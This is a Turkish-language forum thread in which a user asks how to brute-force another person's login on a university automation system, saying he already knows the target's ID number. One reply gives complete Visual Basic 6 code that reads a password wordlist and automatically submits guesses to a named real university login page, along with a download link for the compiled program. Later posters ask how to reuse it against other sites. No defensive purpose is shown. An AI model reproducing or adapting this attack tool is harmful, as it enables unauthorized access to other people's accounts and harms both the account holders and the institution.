folder Tahribat.com Forumları
linefolder Visual Basic - Basic - PicBasic ve Türevleri
linefolder Visual Basicte Brute Force Nasıl Yapılır?Visual Basicte Brute Force Nasıl Yapılır?

 1. KısayolKısayol reportŞikayet pmÖzel Mesaj
  gowand
  gowand's avatar
  Kayıt Tarihi: 07/Ocak/2010
  Erkek

  Slm Ben Bir Üniverstenin Otomasyon Sistemine İçin Burute Force Programı Yapmak İstiyorum Nasıl Yapbilirim....

  Otumasyonu Nasıl Programa Gömebilirim....

   


  with great power comes great irresponsibility ‪#‎deadpool‬
 2. KısayolKısayol reportŞikayet pmÖzel Mesaj
  fivestar
  fivestar's avatar
  Kayıt Tarihi: 30/Haziran/2007
  Erkek

  Herhangi bi list oluşturup kendine internetteki hazır programı kullanabılırsın yeniden yazmana gerek yok diye düşünüyorum


  Ağırdır sevmelerim her yürek taşıyamaz, büyüktür umutlarım her omuz kaldıramaz
 3. KısayolKısayol reportŞikayet pmÖzel Mesaj
  gowand
  gowand's avatar
  Kayıt Tarihi: 07/Ocak/2010
  Erkek

  dostum nettekii otomasyona nasıl gömecem yani naıl deneme yapacam


  with great power comes great irresponsibility ‪#‎deadpool‬
 4. KısayolKısayol reportŞikayet pmÖzel Mesaj
  gowand
  gowand's avatar
  Kayıt Tarihi: 07/Ocak/2010
  Erkek

  mesela adamın tc si kullanıcı adı bende biliyorum

  şifre bolumune attack nasıl yapacağımmm


  with great power comes great irresponsibility ‪#‎deadpool‬
 5. KısayolKısayol reportŞikayet pmÖzel Mesaj
  CodeInside
  CodeInside's avatar
  Banlanmış Üye
  Kayıt Tarihi: 20/Aralık/2009
  Erkek

  gowand bunu yazdı:
  -----------------------------

  dostum nettekii otomasyona nasıl gömecem yani naıl deneme yapacam


  -----------------------------

  otomasyon dediğin sistemin bir internet sitesi varsa yani giriş yapılan bir form varsa çok rahat TextBox'ta ki yada ListBox'ta ki verileri girdirip Submit edebilirsin sitedeki sayfanın kaynak koduna görede kırılıp kırılmadığına dair programda ProgressBar yaparsın kaynak istediğin gibi olunca ProgressBar %100 olur TextBox'a başarılı yazarsın kısaca özetledim :) Yardıma ihtiyacın olursa pm at.

 6. KısayolKısayol reportŞikayet pmÖzel Mesaj
  DE5TROY3R
  DE5TROY3R's avatar
  Kayıt Tarihi: 04/Nisan/2007
  Erkek

  Sistem web sayfası üzerindenmi çalışıyor? Evetse, CodeInside nin dediklerini yap

  Program ile direk veritabanına uzakdan bağlantı kurulmussa. Program üzerinden fareyi,klavyeyi otomatik kullandırtarak yaparsın veya yeni bağlantı kurabiliyorsan kendin kurarsın. Programın döndürdüğü değerlere görede şifrenin doğru olup olmadığını ayıklarsın

   

   

 7. KısayolKısayol reportŞikayet pmÖzel Mesaj
  gowand
  gowand's avatar
  Kayıt Tarihi: 07/Ocak/2010
  Erkek

  code side ye gönderdim siteyide baklımm


  with great power comes great irresponsibility ‪#‎deadpool‬
 8. KısayolKısayol reportŞikayet pmÖzel Mesaj
  DE5TROY3R
  DE5TROY3R's avatar
  Kayıt Tarihi: 04/Nisan/2007
  Erkek

  Doğru şifre olmadığı için tam test edemedim ama çalışması gerekiyor :)

  Wordlist için, programın çalıştığı klasörde sifreler.txt dosyası oluştur

   

  Form1.frm dosyası:

  VERSION 5.00
  Object = "{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}#1.1#0"; "ieframe.dll"
  Begin VB.Form Form1 
    BorderStyle   =  1 'Fixed Single
    Caption     =  "Öğrenci Girişi Bruteforce "
    ClientHeight  =  4500
    ClientLeft   =  45
    ClientTop    =  375
    ClientWidth   =  7530
    LinkTopic    =  "Form1"
    MaxButton    =  0  'False
    ScaleHeight   =  4500
    ScaleWidth   =  7530
    StartUpPosition =  3 'Windows Default
    Begin VB.CommandButton Command1 
     Caption     =  "Başla"
     Height     =  375
     Left      =  600
     TabIndex    =  3
     Top       =  2880
     Width      =  1695
    End
    Begin VB.TextBox kullaniciAdi 
     Height     =  285
     Left      =  600
     TabIndex    =  2
     Text      =  "1234567890"
     Top       =  480
     Width      =  1575
    End
    Begin VB.ListBox sifreler 
     Height     =  2010
     Left      =  600
     TabIndex    =  1
     Top       =  840
     Width      =  1575
    End
    Begin VB.Timer Timer1 
     Enabled     =  0  'False
     Interval    =  5000
     Left      =  120
     Top       =  3120
    End
    Begin SHDocVwCtl.WebBrowser WebBrowser1 
     Height     =  3855
     Left      =  4920
     TabIndex    =  0
     Top       =  960
     Width      =  3975
     ExtentX     =  7011
     ExtentY     =  6800
     ViewMode    =  0
     Offline     =  0
     Silent     =  0
     RegisterAsBrowser=  0
     RegisterAsDropTarget=  1
     AutoArrange   =  0  'False
     NoClientEdge  =  0  'False
     AlignLeft    =  0  'False
     NoWebView    =  0  'False
     HideFileNames  =  0  'False
     SingleClick   =  0  'False
     SingleSelection =  0  'False
     NoFolders    =  0  'False
     Transparent   =  0  'False
     ViewID     =  "{0057D0E0-3573-11CF-AE69-08002B2E1262}"
     Location    =  "http:///"
    End
  End
  Attribute VB_Name = "Form1"
  Attribute VB_GlobalNameSpace = False
  Attribute VB_Creatable = False
  Attribute VB_PredeclaredId = True
  Attribute VB_Exposed = False
  'tahribat.com & tdsoftware.tr.cx
  Dim DenenenSifre
  
  Private Sub Command1_Click()
  Timer1.Enabled = True
  End Sub
  
  Private Sub Form_Load()
  Dim degisken As String
  Open App.Path & "\sifreler.txt" For Input As #1
  Do While Not EOF(1)
  Input #1, wordlistsifreler
  sifreler.AddItem wordlistsifreler
  Loop
  Close #1
  WebBrowser1.Navigate "http://otomasyon.adiyaman.edu.tr/obys/Hoca/"
  End Sub
  
  Private Sub Timer1_Timer()
  If WebBrowser1.LocationURL = "http://otomasyon.adiyaman.edu.tr/obys/Hoca/Default.asp?cat=login" Then 'Denemek için sayfa hazır
  If sifreler.ListCount = DenenenSifre Then
  Timer1.Enabled = False
  MsgBox "İşlem tamamlandı", vbInformation
  Else
  BosluklariDoldurveGir
  DenenenSifre = DenenenSifre + 1
  Me.Caption = "Öğrenci Girişi Bruteforce (" & DenenenSifre & "/" & sifreler.ListCount & ")"
  End If
  
  ElseIf WebBrowser1.LocationURL = "http://otomasyon.adiyaman.edu.tr/obys/Hoca/" Then 'Deniyor
  If sifreler.ListCount = DenenenSifre Then
  Timer1.Enabled = False
  MsgBox "İşlem tamamlandı", vbInformation
  Else
  BosluklariDoldurveGir
  DenenenSifre = DenenenSifre + 1
  Me.Caption = "Öğrenci Girişi Bruteforce (" & DenenenSifre & "/" & sifreler.ListCount & ")"
  End If
  
  ElseIf WebBrowser1.LocationURL = "http://otomasyon.adiyaman.edu.tr/obys/Hoca/Default.asp?cat=logincontrol" Then 'Deniyor
  
  ElseIf WebBrowser1.LocationURL = "" Then 'Doğruymuş
  
  Else
  MsgBox "Şifresi:" & sifreler.List(DenenenSifre), vbOKOnly
  End If
  End Sub
  
  Sub BosluklariDoldurveGir()
  WebBrowser1.Document.All.Item("username").Value = kullaniciAdi.Text
  wait 50
  WebBrowser1.Document.All.Item("password").Value = sifreler.List(DenenenSifre)
  wait 200
  WebBrowser1.Document.All.Item("B1").Click
  End Sub
  
  

  Module1.pas dosyası:

  Attribute VB_Name = "Module1"
  Public Declare Function GetTickCount Lib "kernel32" () As Long
  
  Public Sub wait(ByVal dblMilliseconds As Double)
    Dim dblStart As Double
    Dim dblEnd As Double
    Dim dblTickCount As Double
    
    dblTickCount = GetTickCount()
    dblStart = GetTickCount()
    dblEnd = GetTickCount + dblMilliseconds
    
    Do
    DoEvents
    dblTickCount = GetTickCount()
    Loop Until dblTickCount > dblEnd Or dblTickCount < dblStart
      
    
  End Sub
  
  
  

  Exe & Proje:

  http://www.rapidspread.com/file.jsp?id=2q0vp23xgx

   

   

 9. KısayolKısayol reportŞikayet pmÖzel Mesaj
  mustaphachan
  mustaphachan's avatar
  Kayıt Tarihi: 08/Haziran/2009
  Erkek

  kodlardaki login sayfalarıyla oynayıp bunu benzer sistem ancak farklı sayfalarda uygulayabilir miyiz?


  # birikimini önyargı ve yalanlara hizmet etmek için kullanan kültürlü bir insan olmaktansa maymundan gelmeyi tercih ederim.
 10. KısayolKısayol reportŞikayet pmÖzel Mesaj
  DE5TROY3R
  DE5TROY3R's avatar
  Kayıt Tarihi: 04/Nisan/2007
  Erkek

  mustaphachan bunu yazdı:
  -----------------------------

  kodlardaki login sayfalarıyla oynayıp bunu benzer sistem ancak farklı sayfalarda uygulayabilir miyiz?


  -----------------------------

  Sistem aynı ve yönlenen adresleri doğru girersen çalışabilir

 11. KısayolKısayol reportŞikayet pmÖzel Mesaj
  mustaphachan
  mustaphachan's avatar
  Kayıt Tarihi: 08/Haziran/2009
  Erkek

  eyvallah hocam birazdan deneyip sonucu yazarım. onun dışında bunu çok farklı yerlerde kullanabilmemiz amaçlı bir anlatım yapmayı düşündün mü hiç yada düşünür müsün :) düşünsen çok çok iyi olur da :D


  # birikimini önyargı ve yalanlara hizmet etmek için kullanan kültürlü bir insan olmaktansa maymundan gelmeyi tercih ederim.
Toplam Hit: 4190 Toplam Mesaj: 14